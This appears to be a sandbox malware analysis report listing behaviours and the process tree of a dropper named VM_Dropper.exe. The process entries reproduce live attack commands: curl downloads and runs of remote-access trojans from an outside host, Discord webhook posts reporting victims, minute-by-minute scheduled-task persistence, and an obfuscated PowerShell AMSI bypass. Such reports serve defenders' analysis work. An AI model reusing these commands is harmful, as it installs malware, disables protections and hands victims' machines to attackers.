| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\svchost.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\sachost.exe | N/A |
| N/A | N/A | C:\Users\Admin\penisballs.exe | N/A |
| N/A | N/A | C:\Users\Admin\physics.exe | N/A |
| N/A | N/A | C:\Users\Admin\penisballs.exe | N/A |
| N/A | N/A | C:\Users\Admin\sachost.exe | N/A |
| N/A | N/A | C:\Users\Admin\physics.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\System32\RuntimeBroker.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x238,0x23c,0x240,0x234,0x2f0,0x7fffce9e2e98,0x7fffce9e2ea4,0x7fffce9e2eb0
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=3204 --field-trial-handle=3088,i,14310325015283915034,7660943942870463106,262144 --variations-seed-version /prefetch:3
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe
"C:\Users\Admin\AppData\Local\Temp\VM_Dropper.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1239677728240832532/RFIoqPa0RsA3ISZRB7mropzgu-w8H3HuWhnGN1Nqe_5NlnvP2SuBf7hFvNWch7r5TDhv" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
C:\Windows\SysWOW64\curl.exe
curl "https://discord.com/api/webhooks/1239677728240832532/RFIoqPa0RsA3ISZRB7mropzgu-w8H3HuWhnGN1Nqe_5NlnvP2SuBf7hFvNWch7r5TDhv" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl https://recte.host/xworm/yar.exe --output C:\Users\Admin\yar.exe
C:\Windows\SysWOW64\curl.exe
curl https://recte.host/xworm/yar.exe --output C:\Users\Admin\yar.exe
C:\Users\Admin\yar.exe
"C:\Users\Admin\yar.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl https://recte.host/venom/scchost.exe --output C:\Users\Admin\sachost.exe
C:\Windows\SysWOW64\curl.exe
curl https://recte.host/venom/scchost.exe --output C:\Users\Admin\sachost.exe
C:\Users\Admin\sachost.exe
"C:\Users\Admin\sachost.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl https://recte.host/xworm/penisware.exe --output C:\Users\Admin\penisware.exe
C:\Windows\SysWOW64\curl.exe
curl https://recte.host/xworm/penisware.exe --output C:\Users\Admin\penisware.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Users\Admin\penisware.exe
"C:\Users\Admin\penisware.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl https://recte.host/venom/penisware2.exe --output C:\Users\Admin\penisballs.exe
C:\Windows\SysWOW64\curl.exe
curl https://recte.host/venom/penisware2.exe --output C:\Users\Admin\penisballs.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Users\Admin\penisballs.exe
"C:\Users\Admin\penisballs.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl https://recte.host/xworm/physics.exe --output C:\Users\Admin\physics.exe
C:\Windows\SysWOW64\curl.exe
curl https://recte.host/xworm/physics.exe --output C:\Users\Admin\physics.exe
C:\Users\Admin\physics.exe
"C:\Users\Admin\physics.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl https://recte.host/venom/calc.exe --output C:\Users\Admin\calc.exe
C:\Windows\SysWOW64\curl.exe
curl https://recte.host/venom/calc.exe --output C:\Users\Admin\calc.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "yar" /tr "C:\Users\Admin\AppData\Roaming\yar.exe"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "penisware" /tr "C:\Users\Admin\AppData\Local\penisware.exe"
C:\Users\Admin\calc.exe
"C:\Users\Admin\calc.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl https://recte.host/r77/Install.exe --output C:\Users\Admin\install.exe
C:\Windows\SysWOW64\curl.exe
curl https://recte.host/r77/Install.exe --output C:\Users\Admin\install.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
C:\Users\Admin\install.exe
"C:\Users\Admin\install.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1239677728240832532/RFIoqPa0RsA3ISZRB7mropzgu-w8H3HuWhnGN1Nqe_5NlnvP2SuBf7hFvNWch7r5TDhv" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""@everyone`yar.exe, sachost.exe, penisware.exe, penisballs.exe, physics.exe, calc.exe, and install.exe` Were Just Run On `Admin`'s PC"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
C:\Windows\SysWOW64\curl.exe
curl "https://discord.com/api/webhooks/1239677728240832532/RFIoqPa0RsA3ISZRB7mropzgu-w8H3HuWhnGN1Nqe_5NlnvP2SuBf7hFvNWch7r5TDhv" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""@everyone`yar.exe, sachost.exe, penisware.exe, penisballs.exe, physics.exe, calc.exe, and install.exe` Were Just Run On `Admin`'s PC"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:khqieLPAGIkJ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QaFcTjDysRIKOS,[Parameter(Position=1)][Type]$xFFbXpvOkk)$eDBimKkyPFB=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+'c'+'te'+[Char](100)+''+[Char](68)+''+[Char](101)+''+'l'+''+'e'+''+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+'e'+[Char](109)+''+[Char](111)+''+'r'+'y'+'M'+''+'o'+''+[Char](100)+''+'u'+''+[Char](108)+'e',$False).DefineType('M'+'y'+''+'D'+''+[Char](101)+'l'+'e'+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+''+'T'+''+'y'+'p'+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+'s'+','+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+'c'+','+''+'S'+''+[Char](101)+''+[Char](97)+'l'+'e'+'d,'+[Char](65)+''+[Char](110)+'s'+'i'+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+'A'+[Char](117)+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+'l'+''+'a'+''+'s'+'s',[MulticastDelegate]);$eDBimKkyPFB.DefineConstructor(''+[Char](82)+''+[Char](84)+'Sp'+'e'+''+'c'+'ia'+'l'+''+'N'+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+'B'+'y'+''+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+'P'+'u'+'b'+''+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$QaFcTjDysRIKOS).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+'i'+[Char](109)+'e'+[Char](44)+''+[Char](77)+''+'a'+'na'+[Char](103)+''+[Char](101)+''+[Char](100)+'');$eDBimKkyPFB.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+'e'+'',''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+'i'+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+''+'S'+''+[Char](105)+''+'g'+''+[Char](44)+''+'N'+''+'e'+''+'w'+'S'+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+'Vi'+[Char](114)+''+[Char](116)+'ual',$xFFbXpvOkk,$QaFcTjDysRIKOS).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+'me'+','+''+'M'+''+'a'+''+[Char](110)+'a'+[Char](103)+'ed');Write-Output $eDBimKkyPFB.CreateType();}$wWpwKdmduEOhy=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+[Char](116)+'e'+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+'s'+''+[Char](111)+''+[Char](102)+''+'t'+'.'+'W'+''+[Char](105)+''+'n'+''+'3'+'2'+'.'+''+[Char](85)+'n'+'s'+''+[Char](97)+'f'+'e'+'Na'+[Char](116)+''+'i'+''+[Char](118)+''+[Char](101)+''+[Char](77)+'e'+[Char](116)+'ho'+[Char](100)+''+[Char](115)+'');$CEUggeEQTcKXxV=$wWpwKdmduEOhy.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+'c'+'A'+[Char](100)+''+'d'+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+'S'+''+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$GpCmNAlCOxgkGsQOJwR=khqieLPAGIkJ @([String])([IntPtr]);$nzNlFJJjmdIMbKrTNexeWA=khqieLPAGIkJ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$GBUTUkJFiAC=$wWpwKdmduEOhy.GetMethod('G'+[Char](101)+''+[Char](116)+'M'+[Char](111)+'d'+'u'+''+'l'+''+[Char](101)+''+[Char](72)+''+'a'+''+'n'+''+[Char](100)+''+'l'+'e').Invoke($Null,@([Object]('k'+[Char](101)+''+'r'+'n'+[Char](101)+'l'+'3'+'2'+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')));$FrowdEgXLCLTFX=$CEUggeEQTcKXxV.Invoke($Null,@([Object]$GBUTUkJFiAC,[Object]('L'+[Char](111)+''+'a'+''+[Char](100)+''+'L'+''+[Char](105)+''+[Char](98)+''+[Char](114)+'ar'+'y'+''+[Char](65)+'')));$oykFIuICiuCOVfliw=$CEUggeEQTcKXxV.Invoke($Null,@([Object]$GBUTUkJFiAC,[Object]('Vi'+[Char](114)+''+'t'+'ua'+'l'+''+[Char](80)+'ro'+[Char](116)+''+[Char](101)+''+'c'+'t')));$tIBwnIt=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FrowdEgXLCLTFX,$GpCmNAlCOxgkGsQOJwR).Invoke('am'+[Char](115)+'i'+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'');$WGsEYNoUdYPSzUBII=$CEUggeEQTcKXxV.Invoke($Null,@([Object]$tIBwnIt,[Object](''+'A'+''+[Char](109)+'s'+[Char](105)+''+'S'+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+'u'+'f'+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$QoXaWUPNlz=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($oykFIuICiuCOVfliw,$nzNlFJJjmdIMbKrTNexeWA).Invoke($WGsEYNoUdYPSzUBII,[uint32]8,4,[ref]$QoXaWUPNlz);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$WGsEYNoUdYPSzUBII,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($oykFIuICiuCOVfliw,$nzNlFJJjmdIMbKrTNexeWA).Invoke($WGsEYNoUdYPSzUBII,[uint32]8,0x20,[ref]$QoXaWUPNlz);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+'A'+'R'+''+[Char](69)+'').GetValue('$'+'7'+'7s'+'t'+'a'+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svvhost" /tr "C:\Users\Admin\AppData\Roaming\svvhost.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{7dd393c1-6aab-4696-9d80-7741ae4f0c47}
C:\Users\Admin\yar.exe
"C:\Users\Admin\yar.exe"
C:\Users\Admin\sachost.exe
"C:\Users\Admin\sachost.exe"
C:\Users\Admin\penisware.exe
"C:\Users\Admin\penisware.exe"
C:\Users\Admin\penisballs.exe
"C:\Users\Admin\penisballs.exe"
C:\Users\Admin\physics.exe
"C:\Users\Admin\physics.exe"
C:\Users\Admin\calc.exe
"C:\Users\Admin\calc.exe"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "yar" /tr "C:\Windows\system32\config\systemprofile\AppData\Roaming\yar.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "penisware" /tr "C:\Windows\system32\config\systemprofile\AppData\Local\penisware.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svvhost" /tr "C:\Windows\system32\config\systemprofile\AppData\Roaming\svvhost.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1032 --field-trial-handle=3088,i,14310325015283915034,7660943942870463106,262144 --variations-seed-version /prefetch:8
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 456 -p 3296 -ip 3296
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3296 -s 508
C:\Users\Admin\AppData\Roaming\yar.exe
C:\Users\Admin\AppData\Roaming\yar.exe
C:\Users\Admin\AppData\Local\penisware.exe
C:\Users\Admin\AppData\Local\penisware.exe
C:\Users\Admin\AppData\Roaming\svvhost.exe
C:\Users\Admin\AppData\Roaming\svvhost.exe
C:\Users\Admin\AppData\Roaming\yar.exe
C:\Users\Admin\AppData\Roaming\yar.exe
C:\Users\Admin\AppData\Local\penisware.exe
C:\Users\Admin\AppData\Local\penisware.exe
C:\Users\Admin\AppData\Roaming\svvhost.exe
C:\Users\Admin\AppData\Roaming\svvhost.exe
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5212.0.1571581372\1476419891" -parentBuildID 20221007134813 -prefsHandle 1864 -prefMapHandle 1856 -prefsLen 20749 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e0e81da7-9ca2-4d71-887d-a5ef14a84881} 5212 "\\.\pipe\gecko-crash-server-pipe.5212" 1944 27d776d7b58 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5212.1.1518298457\657006121" -parentBuildID 20221007134813 -prefsHandle 2312 -prefMapHandle 2308 -prefsLen 20785 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f55e3891-880c-419a-b64f-b2885ad826a3} 5212 "\\.\pipe\gecko-crash-server-pipe.5212" 2344 27d77245c58 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5212.2.2022740486\1688792288" -childID 1 -isForBrowser -prefsHandle 3012 -prefMapHandle 3200 -prefsLen 20888 -prefMapSize 233444 -jsInitHandle 1160 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fb9ad5ef-b656-47b3-b4d9-af5b5ef6c8e6} 5212 "\\.\pipe\gecko-crash-server-pipe.5212" 3232 27d7765c358 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5212.3.216660227\1109609678" -childID 2 -isForBrowser -prefsHandle 3492 -prefMapHandle 3512 -prefsLen 26066 -prefMapSize 233444 -jsInitHandle 1160 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e00775e1-32a4-4d35-9da0-d1754d72708d} 5212 "\\.\pipe\gecko-crash-server-pipe.5212" 3532 27d79cf3058 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5212.4.1359970116\1643841891" -childID 3 -isForBrowser -prefsHandle 3760 -prefMapHandle 3704 -prefsLen 26066 -prefMapSize 233444 -jsInitHandle 1160 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d9859021-b126-49fb-beeb-7ee6f7ce0270} 5212 "\\.\pipe\gecko-crash-server-pipe.5212" 3772 27d79b7d258 tab
C:\Program Files\Mozilla Firefox\firefox.exe
